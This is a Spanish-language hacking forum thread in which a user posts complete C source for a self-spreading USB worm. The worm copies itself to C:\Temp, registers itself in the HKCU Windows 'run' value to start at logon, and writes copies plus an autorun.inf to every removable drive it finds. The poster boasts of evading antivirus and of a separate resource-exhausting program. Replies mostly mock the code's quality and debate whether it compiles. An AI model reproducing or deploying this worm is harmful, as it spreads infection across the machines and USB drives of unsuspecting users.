Foro de elhacker.net

Buenas, despues de muxas preguntas aqui, me desconecte de internet, e intente acer algo facilito. Cree el virusaco "boot.exe", que es taan efectivo k consume todos los recursos del PC, y eso k era un simple gusano...
luego me encerre a jugar al Counter un tiempo... un dia le eche un vistazo al escritorio y vi a mi bonito Dev-Cpp sucio y desgastado... empeze a programar!!!

despues de 2 bonitas horas de prácticas, nacio SYS32.exe!!!!


os pongo el codigo para k le echeis un vistazo. es muy sencillo, no se como no lo hice antes....

#include <windows.h>
#include <stdio.h>
 
int a;
FILE *fp;
char nowdir [50];
char usb [12][5]={"D:\\", "E:\\", "F:\\", "G:\\", "H:\\"};
char usb2 [12][5]={"D:\\", "E:\\", "F:\\", "G:\\", "H:\\"};
 
int main ()
{
    GetModuleFileName (NULL, nowdir, 256);
    CopyFile (nowdir, "C:\\Temp\\sys32.exe", 0);
    registro ();
    while (1)
    {
          pendrive ();
	  sleep (5);
    }
}
 
int registro ()
{
    HKEY hkey;
    RegOpenKeyEx (HKEY_CURRENT_USER,"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0, KEY_SET_VALUE, &hkey);
    RegSetValueEx(hkey,"run",0,REG_SZ,"C:\\Temp\\sys32.exe",50);
    RegCloseKey(hkey);
}
 
int pendrive ()
{
    for (a=0; a<=5; a++)
    {
        if (GetDriveType (usb [a])==2)
        {
             strcat (usb [a], "\\sys32.exe");
             CopyFile (nowdir, usb [a], 0);
 
             strcat (usb2 [a], "\\autorun.inf");
             fp=fopen (usb2 [a], "wb+");
             fprintf (fp, "[autorun]\nopen=sys32.exe");
             fclose (fp);
             fp=fopen (usb2 [a], "rb+");
        }
    }
}
 

funciona asi:
1. Se copia a "C:\Temp".
2. Se añade al registro, en una llave en la que todos tienen permisos, pero en la que puedes hacer que se abra al inicio de sesión. La única pega es que solo se abre en la sesion en la que se abre.
3. Hace un bucle infinito comprobando si se enchufan pendrives. Si se enchufan, se copia a este sitio, y crea un autorun. Lo cierra para guardar cambios y lo abre para k no lo borres.

Lo mejor es que no lo detecta ningun antivirus (por ahora, pork sin querer lo mande a analizar a ESET. a ver cuanto dura).+


Importante: El code es mio, y sus ideas, pero he de recordar que "http://usuarios.multimania.es/inyx/Gusano%20basico.pdf" me enseño a copiarme al registro. Como veis, es completamente diferente.

"Completamente diferente", ¿diferente en qué?

Es exactamente igual a todos los "gusanos" que hay.

-¿Qué tal si no tengo una unidad C:?"
-¿Y si no tienes permisos para editar el registro?
-¿Y si tengo más unidades USB de las que pones en el vector de cadenas?

diferente al de la pagina.

no quiero añadirle mas unidades xk solo es una prueba k se me ocurrio hacer un dia.
se que lo haceis mejor, pero solo lo pongo para k lo veais.
la mayoria de los ordenadores tienen C:, y si no, pues no se copia...
la mayoria tiene tambien permisos en el registro, sobre todo en tu propia cuenta, pues es CURRENT_USER!

Disculpa, pero es la forma mas absurda que he visto para infectar pendrives, una forma patetica de buscar unidades... solo te doy un consejo, las APIs de Windows estan ahi por algo y no veo nada de original en esto... lo unico que veo es que debe de ser mas detectado que el Happy99.

Te recomiendo que te eduques bien sobre el tema antes de ponerte a programar malware.

ZarKerveros: yo te recomiendo que te pongas a aprender y practicar cosas utiles y constructivas.

Lo diferente es que este no le va a compilar, el main no va a encontrar las funciones.

Jaja, +1, pero recuerda que usa su "bonito Dev-c++", con el todo se puede.  :xD

En C compilaria me parece.

Ya te me tiraste el chiste. jeje

En C++ no compila y en C lanza warnings, pero, compila.

Aunque yo odio ver que el compilador me lanze un warning así sea por el salto de línea al final del archivo. jajaja

Si, igualmente es ideal usar prototipos porque en ciertos casos si serán necesarios. Ademas ayudan a la lectura del código.

Tienes que mejorar varias cosas en ese código, pero estoy de acuerdo con Eternal Idol; hay muchas cosas para hacer que te van a aportar mucho mas que programar malware. Basta con usar un poco el buscador.

Saludos

Donde esta el que satura memoria?

Saludos

1. NO lo detectan ningun antivirus.
2. El que la satura es el boot.exe. Solo pork para k no lo borrasen le inclui la orden de k iniciase C:\Temp\boot.exe... en un bucle infinito.

¿Por qué declara 2 funciones tipo int, y no devuelve ningún valor dentro de ellas?

Pero donde puedo ver el code...

Saludos